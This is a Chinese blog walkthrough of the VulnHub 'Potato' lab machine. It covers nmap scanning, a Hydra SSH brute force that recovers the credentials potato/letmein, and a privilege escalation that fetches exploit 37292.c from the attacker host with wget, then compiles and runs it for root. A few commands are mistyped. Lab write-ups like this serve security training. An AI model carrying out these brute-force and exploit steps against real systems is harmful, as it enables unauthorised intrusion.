适合新手的Vulnhub简单靶机potato

最新推荐文章于 2024-10-21 11:37:07 发布
最新推荐文章于 2024-10-21 11:37:07 发布
阅读量1.3k 收藏 20
点赞数 10
文章标签: 服务器 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82463993/article/details/136605623
版权

目录

下载地址:

主机发现

信息收集

渗透过程

漏洞利用

flag

下载地址:

Potato (SunCSR): 1 ~ VulnHubicon-default.png?t=N7T8https://www.vulnhub.com/entry/potato-suncsr-1,556/

主机发现

确认靶机与攻击机在一个网段

靶机窗口

信息收集

扫描当前网段存活的主机

arp-scan -l

nmap看看都开放了那些端口

nmap -A -p- -sS -sC -T4 10.4.7.140

-A:启用操作系统检测、版本检测、脚本扫描和路由跟踪

-p:加端口号(指定端口扫描)

-p-:扫描所有端口(1-65535)

-sS:执行SYN扫描,选择SYN扫描时的默认扫描类型

-sC:使用默认脚本集进行扫描,相当于--script=default

-T4:将时间模版设置为激进,增加时间值以加快扫描速度

端口信息:

80tcp协议:是一个运行Apache HTTP服务器版本为2.4.7,该服务器安装在Ubuntu操作系统上

7210tcp协议:是一个运行ssh6.6.1p1版本的2ubuntu2.13的服务器

访问下他的网页 10.4.7.140

跟他的靶机名一样是个土豆

渗透过程

ssh爆破他的7120端口

hydra ssh://10.4.7.140:7120 -l potato -P /usr/share/wordlists/john.lst -vV -f -t 32

目的是通过使用给定的用户名和密码字典文件尝试连接到 SSH 服务器(在 IP 地址 10.4.7.140,端口 7120)

通过爆破获得了一个用户的账号密码

用户名:potato 

密码:letmein

然后远程登录一下(连接端口为7120)

ssh potato@10.4.7.140 -p 7120

看下都有哪些用户

cat /etc/password

通过之前的端口信息知道它用的是ubuntu的服务器

看下ubuntu的版本

cat /etc/*release

在kali里再打开一个终端,搜一下ubuntu 14.04版本的漏洞

searchploit ubuntu 14.04

searchploit 是一个漏洞查找工具

37292.c是一个利用漏洞的本地攻击代码,用于进行本地提权或执行其他操作

漏洞利用

将这个文件拷贝到当前目录

cp /usr/share/exploitdb/exploits/linux/local/37292.c .

然后再kali开启web服务

python3 -m http.server 80

再到potato里把文件下载下来

wget http://10.4.7.138/37292.c

wget:用于再网络上下载文件

10.4.7.138:kali的ip

使用gcc将37292.层进行编译成一个可执行文件,名为exp

gcc 37292.c -o exp

然后执行这个exp文件,就获得root权限了

flag

ymmy明月
关注
Vulnhub-potato靶机实战
千寻的博客
01-12 958
文章目录学习笔记下载靶机下载第一部分 信息收集第一步 主机发现第二步 端口扫描第三步 访问网站第四步 扫描目录第四步 访问扫描出的目录第五步 回到开放的端口,分析,发现7120开放第二部分 ssh利用使用Hydra破解ssh第三部分 提权第一步 查看基本的系统信息第二步 利用MSF查找可利用的漏洞第三步 将文件上传到靶机第四步 查找flag摘抄 学习笔记下载 https://download.csdn.net/download/qq_41901122/14122921 靶机下载 https://www.
Vulnhub入门实战1-DC:1
Yisonj的博客
11-25 2536
Vulnhub入门实战1-DC:1 前言 为了更好的学习Kali渗透测试相关内容,近期接触到Volunhub平台,一个免费提供漏洞靶机进行渗透测试的平台。 实验准备 DC:1靶机下载 kali系统(本实验采用kali-linux-2020-3-live-amd64-iso) 靶机导入,采用VirtualBox和VMware均可 虚拟机准备,将目标靶机DC:1和攻击机kali系统设置为在同一局域网内,本实验采用(NAT模式) 实验目的 查看DC:1的介绍 DC-1是一个专门构建的易受攻
VulnHub靶机入门篇--kioptrix.level 3
2302_78903258的博客
07-29 1052
发现有一个login的登录框,可能存在sql注入漏洞,或者弱口令,并且发现这里有一个LotusCMS,网上查找一个信息,看看有没有相关的漏洞。这边可以看到URI为/lcms/但是我本地是没有这个路径的,所以我们这里需要设置下RHOSTS和URI。使用如下命令选择此 Auxiliary,或者使用命令。这里一直没有什么反应,可能是脚本的原因,用。哎,还是失败 ,查看原因,说使用Nat模式。使用msfconsole命令进入msf6。好像并没有什么用,只能看看80端口的服务。使用第14个的命令或者使用命令。
玩转vulnhub靶场(非常详细),零基础入门到精通,看这一篇就够了
最新发布
分享Python知识
10-21 2135
玩转vulnhub靶场(非常详细),零基础入门到精通,看这一篇就够了
vulnhub potato
qq_44925740的博客
12-07 1484
vulnhub potato(难度:简单)知识点一 信息收集二 从7120端口突破三 爆破linux内核提权 知识点 一 nmap的使用 二 SSH爆破 三 漏洞库的利用 四 LINUX内核提权 一 信息收集 nmap -sn 192.168.1.0/24 确定是靶机IP是192.168.1.204 nmap -p- 192.168.1.204 开启了80端口和7120端口先访问80端口,就只找到了info.php。查看也没发现可用信息。做了很多尝试,发现无果。 二 从7120端口突破 nmap -A
potato靶机
2301_77132421的博客
04-02 799
确定kali自己的ip:192.168.91.139查找靶机的ip:nmap 192.168.91.0/24打开浏览器,输入靶机的ip地址是一个土豆potato,没有别的信息再详细扫描一下ip:nmap 192.168.91.143 -A -p-可以看到除了80端口,还开启了一个7120的ssh端口结合刚才的网页是一个土豆,可以猜测一下,它的用户名就是potato,我们使用九头蛇来进行密码爆破试一下爆破到了用户名:potato密码:letmein。
靶场实战(7):OSCP备考之VulnHub Potato 1
OneMoreThink
01-04 1152
靶机官网:Potato: 1[1]实战思路:主机发现端口发现(服务、组件、版本)漏洞发现(获取权限)2112端口/FTP服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞1(目录、文件)URL漏洞2(目录、文件)22端口/SSH服务组件漏洞口令漏洞提升权限01、suid02、cron03、sudo一、主机发现本次攻击指定IP,不涉及主机发现过程。二、端口发现(服务、组件、版本)使用命令s...
vulnhub-Potato-wp
yutianovo的博客
09-13 630
靶机描述 blog http://blog.yutian233.xyz/ VM name : Potato Type: Boot to Root DHCP : Enabled Difficulty : Easy to medium Goal: 2 flags (user.txt and root.txt) This VM has been tested with VirtualBox 下载 https://www.vulnhub.com/entry/potato-1,529/ 清单 信息搜集 ne
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhubpotato.zip
01-12
Vulnhubpotato靶机靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
potato
03-16
土豆 -------------------------------------------
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
渗透靶场 Vulnhub:dc-3 简单复现
qq_47168481的博客
09-12 329
渗透靶场 DC-3 复现
VulnHub渗透测试实战靶场 - POTATO (SUNCSR): 1
LYJ20010728的博客
08-20 1438
@[TOC](VulnHub渗透测试实战靶场 - POTATO (SUNCSR): 1) 环境下载 戳此进行环境下载 POTATO (SUNCSR): 1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.139 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-65535 192.1
Vulnhub靶机实战-Potato (SunCSR)
黑白的博客
01-18 1477
声明 好好学习,天天向上 搭建 vmware打开,网络和攻击机一样,要么都用桥接要么都用NAT 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.164 -p 1-65535 -oN nmap.A 开启端口 发现开启80,7120 7120ssh没有用默认端口,好评 访问80 http://192.168.31.164 竟然是个图像大土豆 果断扫描目录 python3 dirsearch.py -u 192.168.31.164 info
Vulnhub 靶场】【Hackable: III】【简单 - 中等】【20210602】
惟忆
12-09 1105
靶场介绍:https://www.vulnhub.com/entry/hackable-iii,720/ 靶场下载:https://download.vulnhub.com/hackable/hackable3.ova 靶场难度:简单 - 中等 发布日期:2021年06月02日 文件大小:1.6 GB 靶场作者:Elias Sousa 靶场系列:Hackable 靶场描述:关注CTF的一般概念 打靶耗时:4+小时,敲门信息没有注意文件名称,绕了个弯,后面还算是顺畅
Potato靶机测试
m0_56375711的博客
08-21 1647
potato靶机渗透
Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记
ZhangAweio的博客
04-08 3570
入门的靶机是非常适合刚入门的小伙伴,拿去练习,虽然挑战性不大,但是还是很有必要去来练习的,这个主要是考察一个很简单的渗透过程,在真实环境当中,需要我们更多的是随机应变,加油网安人,让我们一起共同进步吧!
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值